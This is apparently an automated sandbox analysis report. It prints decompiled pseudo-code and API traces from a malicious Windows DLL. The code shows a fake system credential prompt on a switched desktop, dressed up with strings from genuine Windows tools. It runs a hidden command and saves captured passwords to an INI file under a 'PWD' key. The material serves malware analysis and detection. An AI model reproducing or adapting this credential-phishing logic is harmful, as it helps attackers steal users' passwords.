                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextCryptRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 829835001-0
                                                                                                                        • Opcode ID: 22f67e1bd3082f67f1d399dab6d374a6d6ba206afe87cad3f0fb455d7675ea80
                                                                                                                        • Instruction ID: a28f9624261ed1cc92e274a0c8a16e20ac6c084fd537040876df22b151789737
                                                                                                                        • Opcode Fuzzy Hash: 22f67e1bd3082f67f1d399dab6d374a6d6ba206afe87cad3f0fb455d7675ea80
                                                                                                                        • Instruction Fuzzy Hash: 4AC08C323052206FF7212B38FC05FA63BE9FF42311F140066F600D62A0DF109D418698
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F339D10, Relevance: 86.1, APIs: 43, Strings: 6, Instructions: 310memorywindowsleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 87%
                                                                                                                        			E6F339D10() {
				intOrPtr _v32;
				char _v264;
				char _v272;
				void* _v284;
				WCHAR* _v288;
				void* _v292;
				WCHAR* _v296;
				WCHAR* _v300;
				char _v324;
				char* _v328;
				intOrPtr _v332;
				WCHAR* _v340;
				void* _v344;
				void* _v348;
				void* _v356;
				void* _v360;
				void* _v364;
				void* _v368;
				intOrPtr _v372;
				long _v376;
				WCHAR* _v380;
				char _v384;
				void* _v388;
				void* _v392;
				void* _v396;
				char _v400;
				struct HINSTANCE__* _v404;
				void* _v408;
				short _v412;
				short _v416;
				char _v420;
				struct HDESK__* _t62;
				struct HDESK__* _t66;
				CHAR* _t72;
				WCHAR* _t114;
				void* _t118;
				WCHAR* _t119;
				WCHAR* _t120;
				struct HDESK__* _t121;
				struct HDESK__* _t122;
				char _t130;
				struct HINSTANCE__* _t136;
				void* _t139;
				void* _t141;
				struct HINSTANCE__* _t142;
				WCHAR* _t143;
				WCHAR* _t144;
				WCHAR* _t145;
				WCHAR* _t146;
				WCHAR* _t147;
				WCHAR* _t148;
				WCHAR* _t151;
				short* _t153;
				short* _t154;
				short* _t155;

				_t62 =  *0x6f340480; // 0x0
				SwitchDesktop(_t62);
				_t121 =  *0x6f340480; // 0x0
				SetThreadDesktop(_t121);
				__imp__CoInitializeEx(0, 6);
				_t142 = LoadLibraryA("comctl32.dll");
				_v404 = _t142;
				if(_t142 != 0) {
					_push(0xff000000);
					_push(1);
					_push( &_v400);
					_push(_t142);
					_v400 = 0xc590294f;
					_v396 = 0;
					_v392 = 0;
					_v388 = 0;
					E6F331DB0();
					_t153 =  &(( &_v412)[8]);
					if(_v388 != 0) {
						_t72 = GetCommandLineA();
						_v420 = 0;
						_t139 = E6F33A3D0(_t72,  &_v420);
						_t154 =  &(_t153[4]);
						_v416 = _t139;
						if(_t139 != 0) {
							if(_v420 > 3) {
								_t130 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
								wsprintfA( &_v272, "%s%s", _t130, "DFDWiz.exe");
								_t155 =  &(_t154[8]);
								_t136 = LoadLibraryExA( &_v264, 0, 0x20);
								if(_t136 != 0) {
									_t141 = HeapAlloc(GetProcessHeap(), 8, 0x1770);
									if(_t141 != 0) {
										_t23 = _t141 + 0x190; // 0x190
										_t143 = _t23;
										if(LoadStringW(_t136, 0x79, _t143, 0xc8) > 0) {
											_v340 = _t143;
										}
										_t25 = _t141 + 0x320; // 0x320
										_t144 = _t25;
										if(LoadStringW(_t136, 0x7c, _t144, 0x3e8) > 0) {
											_t114 = StrChrW(_t144, 0xa);
											if(_t114 != 0) {
												_v340 =  &(_t114[1]);
											}
										}
										_t27 = _t141 + 0xaf0; // 0xaf0
										_t145 = _t27;
										if(FormatMessageW(0xaff, _t136, 0x50000001, 0, _t145, 0x64, 0) != 0) {
											_v288 = _t145;
										}
										_t29 = _t141 + 0xbb8; // 0xbb8
										_t146 = _t29;
										if(LoadStringW(_t136, 0x1b0, _t146, 0x64) > 0) {
											_t30 = _t141 + 0xc80; // 0xc80
											if(LoadStringW(_t136, 0xf6, _t30, 0x64) > 0) {
												_t31 = _t141 + 0xc80; // 0xc80
												_v372 = _t31;
												_v384 = 1;
												_v380 = _t146;
												_v376 = 8;
												_v332 = 2;
												_v324 = 1;
												_v328 =  &_v384;
											}
										}
										_t40 = _t141 + 0xd48; // 0xd48
										_t147 = _t40;
										if(LoadStringW(_t136, 0x7e, _t147, 0x64) > 0) {
											_v296 = _t147;
										}
										_t42 = _t141 + 0xe10; // 0xe10
										_t148 = _t42;
										if(LoadStringW(_t136, 0x7f, _t148, 0x64) > 0) {
											_v300 = _t148;
										}
										_t44 = _t141 + 0xed8; // 0xed8
										if(LoadStringW(_t136, 0x81, _t44, 0xc8) > 0) {
											PathBuildRootW( &_v412, PathGetDriveNumberA( &_v272));
											_t47 = _t141 + 0x1068; // 0x1068
											_t120 = _t47;
											GetVolumeInformationW( &_v416, _t120, 0x64, 0, 0, 0, 0, 0);
											_v412 = 0;
											_t50 = _t141 + 0x1130; // 0x1130
											_t151 = _t50;
											if( *_t120 == 0) {
												_t120 = L"<n/a>";
											}
											_t52 = _t141 + 0xed8; // 0xed8
											wsprintfW(_t151, _t52,  &_v416, _t120);
											_t155 =  &(_t155[8]);
											_v300 = _t151;
										}
										_t118 = HeapAlloc(GetProcessHeap(), 0, 0x105);
										if(_t118 != 0) {
											wsprintfA(_t118, "/c start /b \"\" \"%s\" f w %d",  *((intOrPtr*)(_v416 + 0xc)), 5);
											E6F339C50(0, 0x83f2, _t118);
											_v400( &_v380, 0, 0, 0, 0, 0);
											HeapFree(GetProcessHeap(), 0, _t118);
											if(_v32 != 0) {
												Sleep(0x1f4);
												E6F3396D0(0);
											}
											Sleep(0x1f4);
										}
										if(FormatMessageW(0xaff, _t136, 0xb0000002, 0, _t141, 0x1f4, 0) != 0) {
											_t59 = _t141 + 0x3e8; // 0x3e8
											_t119 = _t59;
											if(FormatMessageW(0xaff, _t136, 0x50000004, 0, _t119, 0x64, 0) != 0) {
												MessageBoxW(0, _t141, _t119, 0x40);
												Sleep(0x1f4);
											}
										}
										HeapFree(GetProcessHeap(), 0, _t141);
										_t142 = _v404;
									}
									FreeLibrary(_t136);
									_t139 = _v408;
								}
							}
							LocalFree(_t139);
						}
					}
					FreeLibrary(_t142);
				}
				__imp__CoUninitialize();
				_t66 =  *0x6f340484; // 0x0
				SwitchDesktop(_t66);
				_t122 =  *0x6f340484; // 0x0
				SetThreadDesktop(_t122);
				return 0;
			}


























































                                                                                                                        0x6f339d16
                                                                                                                        0x6f339d1e
                                                                                                                        0x6f339d24
                                                                                                                        0x6f339d2b
                                                                                                                        0x6f339d36
                                                                                                                        0x6f339d47
                                                                                                                        0x6f339d49
                                                                                                                        0x6f339d4f
                                                                                                                        0x6f339d55
                                                                                                                        0x6f339d5a
                                                                                                                        0x6f339d60
                                                                                                                        0x6f339d61
                                                                                                                        0x6f339d62
                                                                                                                        0x6f339d6a
                                                                                                                        0x6f339d6e
                                                                                                                        0x6f339d72
                                                                                                                        0x6f339d76
                                                                                                                        0x6f339d7b
                                                                                                                        0x6f339d82
                                                                                                                        0x6f339d89
                                                                                                                        0x6f339d95
                                                                                                                        0x6f339d9e
                                                                                                                        0x6f339da0
                                                                                                                        0x6f339da3
                                                                                                                        0x6f339da9
                                                                                                                        0x6f339db4
                                                                                                                        0x6f339dba
                                                                                                                        0x6f339dd4
                                                                                                                        0x6f339dda
                                                                                                                        0x6f339dee
                                                                                                                        0x6f339df2
                                                                                                                        0x6f339e0c
                                                                                                                        0x6f339e10
                                                                                                                        0x6f339e76
                                                                                                                        0x6f339e76
                                                                                                                        0x6f339e84
                                                                                                                        0x6f339e86
                                                                                                                        0x6f339e86
                                                                                                                        0x6f339e8f
                                                                                                                        0x6f339e8f
                                                                                                                        0x6f339e9d
                                                                                                                        0x6f339ea2
                                                                                                                        0x6f339eaa
                                                                                                                        0x6f339eaf
                                                                                                                        0x6f339eaf
                                                                                                                        0x6f339eaa
                                                                                                                        0x6f339eb7
                                                                                                                        0x6f339eb7
                                                                                                                        0x6f339ed3
                                                                                                                        0x6f339ed5
                                                                                                                        0x6f339ed5
                                                                                                                        0x6f339ede
                                                                                                                        0x6f339ede
                                                                                                                        0x6f339eef
                                                                                                                        0x6f339ef3
                                                                                                                        0x6f339f04
                                                                                                                        0x6f339f06
                                                                                                                        0x6f339f11
                                                                                                                        0x6f339f19
                                                                                                                        0x6f339f1d
                                                                                                                        0x6f339f21
                                                                                                                        0x6f339f29
                                                                                                                        0x6f339f31
                                                                                                                        0x6f339f35
                                                                                                                        0x6f339f35
                                                                                                                        0x6f339f04
                                                                                                                        0x6f339f3b
                                                                                                                        0x6f339f3b
                                                                                                                        0x6f339f49
                                                                                                                        0x6f339f4b
                                                                                                                        0x6f339f4b
                                                                                                                        0x6f339f54
                                                                                                                        0x6f339f54
                                                                                                                        0x6f339f62
                                                                                                                        0x6f339f64
                                                                                                                        0x6f339f64
                                                                                                                        0x6f339f70
                                                                                                                        0x6f339f81
                                                                                                                        0x6f339f97
                                                                                                                        0x6f339fa9
                                                                                                                        0x6f339fa9
                                                                                                                        0x6f339fb5
                                                                                                                        0x6f339fbd
                                                                                                                        0x6f339fc2
                                                                                                                        0x6f339fc2
                                                                                                                        0x6f339fcb
                                                                                                                        0x6f339fcd
                                                                                                                        0x6f339fcd
                                                                                                                        0x6f339fd8
                                                                                                                        0x6f339fe0
                                                                                                                        0x6f339fe6
                                                                                                                        0x6f339fe9
                                                                                                                        0x6f339fe9
                                                                                                                        0x6f33a006
                                                                                                                        0x6f33a00a
                                                                                                                        0x6f33a01c
                                                                                                                        0x6f33a031
                                                                                                                        0x6f33a041
                                                                                                                        0x6f33a04b
                                                                                                                        0x6f33a059
                                                                                                                        0x6f33a060
                                                                                                                        0x6f33a068
                                                                                                                        0x6f33a068
                                                                                                                        0x6f33a072
                                                                                                                        0x6f33a072
                                                                                                                        0x6f33a097
                                                                                                                        0x6f33a09d
                                                                                                                        0x6f33a09d
                                                                                                                        0x6f33a0b5
                                                                                                                        0x6f33a0bd
                                                                                                                        0x6f33a0c8
                                                                                                                        0x6f33a0c8
                                                                                                                        0x6f33a0b5
                                                                                                                        0x6f33a0d8
                                                                                                                        0x6f33a0de
                                                                                                                        0x6f33a0de
                                                                                                                        0x6f33a0e3
                                                                                                                        0x6f33a0e9
                                                                                                                        0x6f33a0e9
                                                                                                                        0x6f33a0ed
                                                                                                                        0x6f33a0ef
                                                                                                                        0x6f33a0ef
                                                                                                                        0x6f33a0f5
                                                                                                                        0x6f33a0f7
                                                                                                                        0x6f33a0f7
                                                                                                                        0x6f33a0fd
                                                                                                                        0x6f33a103
                                                                                                                        0x6f33a109
                                                                                                                        0x6f33a10f
                                                                                                                        0x6f33a116
                                                                                                                        0x6f33a126

                                                                                                                        APIs
                                                                                                                        • SwitchDesktop.USER32(00000000), ref: 6F339D1E
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F339D2B
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000006), ref: 6F339D36
                                                                                                                        • LoadLibraryA.KERNEL32(comctl32.dll), ref: 6F339D41
                                                                                                                        • GetCommandLineA.KERNEL32(?,00000001,FF000000), ref: 6F339D89
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • wsprintfA.USER32 ref: 6F339DD4
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000020,?,?,?,?,?,?,00000001,FF000000), ref: 6F339DE8
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001770,?,?,?,?,?,?,00000001,FF000000), ref: 6F339DFF
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F339E06
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000060), ref: 6F339E1D
                                                                                                                        • LoadStringW.USER32 ref: 6F339E67
                                                                                                                        • LoadStringW.USER32(00000000,00000079,00000190,000000C8), ref: 6F339E80
                                                                                                                        • LoadStringW.USER32(00000000,0000007C,00000320,000003E8), ref: 6F339E99
                                                                                                                        • StrChrW.SHLWAPI(00000320,0000000A), ref: 6F339EA2
                                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,50000001,00000000,00000AF0,00000064,00000000), ref: 6F339ECB
                                                                                                                        • LoadStringW.USER32(00000000,000001B0,00000BB8,00000064), ref: 6F339EEB
                                                                                                                        • LoadStringW.USER32(00000000,000000F6,00000C80,00000064), ref: 6F339F00
                                                                                                                        • LoadStringW.USER32(00000000,0000007E,00000D48,00000064), ref: 6F339F45
                                                                                                                        • LoadStringW.USER32(00000000,0000007F,00000E10,00000064), ref: 6F339F5E
                                                                                                                        • LoadStringW.USER32(00000000,00000081,00000ED8,000000C8), ref: 6F339F7D
                                                                                                                        • PathGetDriveNumberA.SHLWAPI(?), ref: 6F339F8B
                                                                                                                        • PathBuildRootW.SHLWAPI(?,00000000), ref: 6F339F97
                                                                                                                        • GetVolumeInformationW.KERNEL32(?,00001068,00000064,00000000,00000000,00000000,00000000,00000000), ref: 6F339FB5
                                                                                                                        • wsprintfW.USER32 ref: 6F339FE0
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000105), ref: 6F339FFD
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33A000
                                                                                                                        • wsprintfA.USER32 ref: 6F33A01C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F33A048
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F33A04B
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F33A060
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F33A072
                                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,B0000002,00000000,00000000,000001F4,00000000), ref: 6F33A093
                                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,50000004,00000000,000003E8,00000064,00000000), ref: 6F33A0B1
                                                                                                                        • MessageBoxW.USER32(00000000,00000000,000003E8,00000040), ref: 6F33A0BD
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F33A0C8
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33A0D1
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33A0D8
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F33A0E3
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F33A0EF
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,FF000000), ref: 6F33A0F7
                                                                                                                        • CoUninitialize.OLE32 ref: 6F33A0FD
                                                                                                                        • SwitchDesktop.USER32(00000000), ref: 6F33A109
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F33A116
                                                                                                                          • Part of subcall function 6F331DB0: lstrlenA.KERNEL32(00000000,00000000), ref: 6F331E3E
                                                                                                                          • Part of subcall function 6F331DB0: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6F331E48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$HeapString$Free$DesktopLibraryMessageProcess$AllocFormatSleepwsprintf$LocalPathSwitchThreadlstrlen$BuildCommandComputeCrc32DriveInformationInitializeLineMemoryNumberRootUninitializeVolumeZero
                                                                                                                        • String ID: %s%s$/c start /b "" "%s" f w %d$<n/a>$DFDWiz.exe$`$comctl32.dll
                                                                                                                        • API String ID: 3108343870-2776518243
                                                                                                                        • Opcode ID: ecaf68d1970cbbc817ad17a9d3c1f9accc9bc5c5c3191fd046d90c7fd459eda3
                                                                                                                        • Instruction ID: fc877c8d6a33d97534f31cc0a69ba9fb648d905e22f708a5f35fd157cffaf9bb
                                                                                                                        • Opcode Fuzzy Hash: ecaf68d1970cbbc817ad17a9d3c1f9accc9bc5c5c3191fd046d90c7fd459eda3
                                                                                                                        • Instruction Fuzzy Hash: B3B1937254478AAFEB20DFA0CC85F9B7BADEB45B10F00481CF255961C0DBB5E414CB26
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3396D0, Relevance: 77.3, APIs: 38, Strings: 6, Instructions: 346memorysleeplibraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 47%
                                                                                                                        			E6F3396D0(intOrPtr _a4) {
				intOrPtr _v4;
				signed int _v72;
				char _v1028;
				short _v1036;
				char _v1048;
				void* _v1296;
				char _v1300;
				void* _v1304;
				intOrPtr _v1308;
				void* _v1312;
				void* _v1316;
				void* _v1320;
				intOrPtr _v1324;
				void* _v1328;
				void* _v1332;
				void* _v1336;
				intOrPtr _v1340;
				void* _v1344;
				void* _v1348;
				void* _v1352;
				char _v1356;
				WCHAR* _v1368;
				short* _v1372;
				char _v1376;
				void* _v1380;
				intOrPtr _v1384;
				void* _v1392;
				intOrPtr _v1396;
				struct HINSTANCE__* _v1400;
				void* _v1404;
				char _v1412;
				char _v1416;
				void* _v1420;
				long _v1424;
				long _v1432;
				long _v1436;
				long _v1448;
				intOrPtr _v1452;
				long _v1456;
				intOrPtr _v1472;
				char _v1480;
				char _v1496;
				intOrPtr _v1500;
				intOrPtr _v1508;
				intOrPtr _v1524;
				void* _v1532;
				intOrPtr _v1544;
				void* _v1556;
				void* _t93;
				void* _t94;
				void* _t99;
				CHAR* _t106;
				void* _t110;
				void* _t133;
				int _t140;
				signed int _t145;
				struct HDESK__* _t149;
				void* _t152;
				struct HINSTANCE__* _t154;
				void* _t155;
				WCHAR* _t156;
				WCHAR* _t157;
				struct HDESK__* _t158;
				struct HDESK__* _t171;
				WCHAR* _t174;
				WCHAR* _t180;
				struct HDESK__* _t183;
				WCHAR* _t185;
				struct HINSTANCE__* _t188;
				short* _t190;
				void* _t191;
				signed int _t195;
				signed int _t196;
				WCHAR* _t199;
				long _t200;
				short* _t202;
				void* _t204;
				void* _t205;
				void* _t206;

				_t93 = M6F340504; // 0xa59868
				_t157 = M6F3404F8; // 0xa56660
				_t94 = E6F335130(_t157, _t93, 0x6f33d664);
				_t204 =  &_v1416 + 0xc;
				if(_t94 != 0) {
					L39:
					return 0;
				} else {
					_t152 = 0;
					if(_a4 != 0) {
						_t183 =  *0x6f340480; // 0x0
						SwitchDesktop(_t183);
						_t149 =  *0x6f340480; // 0x0
						SetThreadDesktop(_t149);
					}
					_t188 = LoadLibraryA("credui.dll");
					_v1380 = _t188;
					if(_t188 == _t152) {
						L37:
						if(_a4 != _t152) {
							Sleep(0x7d0);
							_t158 =  *0x6f340484; // 0x0
							SwitchDesktop(_t158);
							_t171 =  *0x6f340484; // 0x0
							SetThreadDesktop(_t171);
						}
						goto L39;
					}
					_push(0xff000000);
					_push(4);
					_push( &_v1356);
					_push(_t188);
					_v1356 = 0x24bec39d;
					_v1352 = _t152;
					_v1348 = _t152;
					_v1344 = _t152;
					_v1340 = 0xb4bb2c26;
					_v1336 = _t152;
					_v1332 = _t152;
					_v1328 = _t152;
					_v1324 = 0x4b177521;
					_v1320 = _t152;
					_v1316 = _t152;
					_v1312 = _t152;
					_v1308 = 0xc07eb83e;
					_v1304 = _t152;
					_v1300 = _t152;
					_v1296 = _t152;
					_t99 = E6F331DB0();
					_t205 = _t204 + 0x10;
					if(_t99 == 0) {
						L36:
						FreeLibrary(_t188);
						goto L37;
					}
					_t185 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
					if(_t185 == _t152) {
						L35:
						goto L36;
					}
					_push(0x14);
					_push( &_v1376);
					L6F33C2EE();
					_v1384 = 0x14;
					_v1380 = _t152;
					_v1412 = 0x202;
					_v1396 = 0x101;
					_t26 =  &(_t185[0x657]); // 0xcae
					_t190 = _t26;
					_t27 =  &(_t185[0x6d8]); // 0xdb0
					_t199 = _t27;
					GetSystemDirectoryA( &_v1300, 0x104);
					PathAddBackslashA( &_v1300);
					_t106 = "rstrui.exe";
					if(_v4 != _t152) {
						_t106 = "wuaueng.dll";
					}
					lstrcatA( &_v1300, _t106);
					_t154 = LoadLibraryExA( &_v1300, _t152, 0x20);
					if(_t154 == 0) {
						L20:
						_t174 = M6F3404F8; // 0xa56660
						_t110 = M6F340504; // 0xa59868
						_t200 = 0;
						_t191 = 0;
						_v1392 = 0;
						_v1424 = 0;
						_v1416 = 0;
						_v1404 = 0;
						_v1420 = 0;
						wsprintfW( &_v1036, L"%s\\%s", _t110, _t174);
						_t206 = _t205 + 0x10;
						_push( &_v1412);
						_push(0);
						_push(0x6f33d664);
						_push( &_v1028);
						_push(0);
						if(_v1296() != 0 || GetLastError() != 0x7a) {
							L34:
							HeapFree(GetProcessHeap(), _t200, _t185);
							_t188 = _v1400;
							_t152 = 0;
							goto L35;
						} else {
							_t155 = HeapAlloc(GetProcessHeap(), 8, _v1432);
							_v1420 = _t155;
							if(_t155 == 0) {
								goto L34;
							}
							_push( &_v1432);
							_push(_t155);
							_push(0x6f33d664);
							_push( &_v1048);
							_push(0);
							if(_v1316() == 0) {
								L33:
								HeapFree(GetProcessHeap(), _t200, _t155);
								goto L34;
							}
							while(1) {
								L25:
								_push(0x20);
								_push( &_v1436);
								_push( &_v1448);
								_push( &_v1456);
								_push(_v1452);
								_push(_t155);
								_push( &_v1424);
								_push(_t191);
								_push( &_v1416);
								_v1432 = 1;
								_v1424 = _t200;
								_v1456 = _t200;
								_v1448 = _t200;
								_v1436 = _t200;
								if(_v1384() != 0) {
									break;
								}
								_push(0x404);
								_push(_t185);
								_v1480 = 0x202;
								L6F33C2EE();
								_push(0x202);
								_t74 =  &(_t185[0x202]); // 0x404
								_t156 = _t74;
								_push(_t156);
								_v1472 = 0x101;
								L6F33C2EE();
								_push( &_v1480);
								_push(_t156);
								_push(_t200);
								_push(_t200);
								_push( &_v1496);
								_push(_t185);
								_push(_v1500);
								_push(_v1508);
								_push(1);
								if(_v1420() != 0) {
									_push(0x404);
									_t81 =  &(_t185[0x303]); // 0x606
									_t202 = _t81;
									_push(_t202);
									L6F33C2EE();
									_push(0x2a4);
									_t82 =  &(_t185[0x505]); // 0xa0a
									L6F33C2EE();
									_push(0x152);
									_t83 =  &(_t185[0x505]); // 0xa0a
									_push(0x202);
									_push(_t202);
									_push(_t185);
									if(_v1456() == 0) {
										_t85 =  &(_t185[0x505]); // 0xa0a
										_t133 = E6F335130(_t202, _t85, _t156);
										_t206 = _t206 + 0xc;
										if(_t133 == 0) {
											_v1556 = 0;
											_t191 = 0x52e;
										} else {
											_t180 = M6F3404D0; // 0xa58418
											WritePrivateProfileStringW(L"PWD", _t185, _t156, _t180);
										}
									}
									_t200 = 0;
								}
								__imp__CoTaskMemFree(_v1544);
								_t155 = _v1532;
								if(_v1524 == _t200) {
									continue;
								} else {
									goto L33;
								}
							}
							asm("sbb esi, esi");
							_t191 = ( ~_v72 & 0xfffff693) + 0xfdb;
							Sleep(0x1f4);
							goto L25;
						}
					} else {
						_push(0x80);
						_push(_t190);
						if(_v4 != 0) {
							if(LoadStringW(_t154, 0x69, ??, ??) > 0) {
								_v1372 = _t190;
							}
							_t195 = FormatMessageW(0xaff, _t154, 0xb0000028, 0, _t199, 0x926, 0);
							_t196 = _t195 + LoadStringW(_t154, 0x184,  &(_t199[_t195]), 0x926 - _t195);
							_t140 = wsprintfW( &(_t199[_t196]), L"\r\n\r\n");
							_t205 = _t205 + 8;
							FormatMessageW(0x12ff, 0, 0x1109, 0,  &(_t199[_t196 + _t140]), 0x926 - _t196 + _t140, 0);
							L18:
							_v1368 = _t199;
							L19:
							FreeLibrary(_t154);
							goto L20;
						}
						_t145 = LoadStringW(_t154, 0xab, ??, ??);
						if(_t145 > 0) {
							_t34 = _t145 * 2; // 0xcb2
							_t190[_t145] = 0x20002e;
							if(LoadStringW(_t154, 0x91, _t190 + _t34 + 4, 0x80 - _t145) > 0) {
								_v1372 = _t190;
							}
						}
						if(LoadStringW(_t154, 0xd2, _t199, 0x926) <= 0) {
							goto L19;
						} else {
							goto L18;
						}
					}
				}
			}


















































































                                                                                                                        0x6f3396d0
                                                                                                                        0x6f3396d5
                                                                                                                        0x6f3396e8
                                                                                                                        0x6f3396ed
                                                                                                                        0x6f3396f2
                                                                                                                        0x6f339b97
                                                                                                                        0x6f339b9f
                                                                                                                        0x6f3396f8
                                                                                                                        0x6f3396f9
                                                                                                                        0x6f339703
                                                                                                                        0x6f339705
                                                                                                                        0x6f33970c
                                                                                                                        0x6f339712
                                                                                                                        0x6f339718
                                                                                                                        0x6f339718
                                                                                                                        0x6f339729
                                                                                                                        0x6f33972b
                                                                                                                        0x6f339731
                                                                                                                        0x6f339b67
                                                                                                                        0x6f339b70
                                                                                                                        0x6f339b77
                                                                                                                        0x6f339b7d
                                                                                                                        0x6f339b84
                                                                                                                        0x6f339b8a
                                                                                                                        0x6f339b91
                                                                                                                        0x6f339b91
                                                                                                                        0x00000000
                                                                                                                        0x6f339b70
                                                                                                                        0x6f339737
                                                                                                                        0x6f33973c
                                                                                                                        0x6f339742
                                                                                                                        0x6f339743
                                                                                                                        0x6f339744
                                                                                                                        0x6f33974c
                                                                                                                        0x6f339750
                                                                                                                        0x6f339754
                                                                                                                        0x6f339758
                                                                                                                        0x6f339760
                                                                                                                        0x6f339764
                                                                                                                        0x6f339768
                                                                                                                        0x6f33976c
                                                                                                                        0x6f339774
                                                                                                                        0x6f339778
                                                                                                                        0x6f33977c
                                                                                                                        0x6f339783
                                                                                                                        0x6f33978e
                                                                                                                        0x6f339795
                                                                                                                        0x6f33979c
                                                                                                                        0x6f3397a3
                                                                                                                        0x6f3397a8
                                                                                                                        0x6f3397ad
                                                                                                                        0x6f339b60
                                                                                                                        0x6f339b61
                                                                                                                        0x00000000
                                                                                                                        0x6f339b61
                                                                                                                        0x6f3397c8
                                                                                                                        0x6f3397cc
                                                                                                                        0x6f339b5f
                                                                                                                        0x00000000
                                                                                                                        0x6f339b5f
                                                                                                                        0x6f3397d3
                                                                                                                        0x6f3397d9
                                                                                                                        0x6f3397da
                                                                                                                        0x6f3397ec
                                                                                                                        0x6f3397f4
                                                                                                                        0x6f3397f8
                                                                                                                        0x6f339800
                                                                                                                        0x6f339808
                                                                                                                        0x6f339808
                                                                                                                        0x6f33980e
                                                                                                                        0x6f33980e
                                                                                                                        0x6f339814
                                                                                                                        0x6f339822
                                                                                                                        0x6f339828
                                                                                                                        0x6f339834
                                                                                                                        0x6f339836
                                                                                                                        0x6f339836
                                                                                                                        0x6f339844
                                                                                                                        0x6f33985b
                                                                                                                        0x6f33985f
                                                                                                                        0x6f339958
                                                                                                                        0x6f339958
                                                                                                                        0x6f33995e
                                                                                                                        0x6f339965
                                                                                                                        0x6f339974
                                                                                                                        0x6f339976
                                                                                                                        0x6f33997a
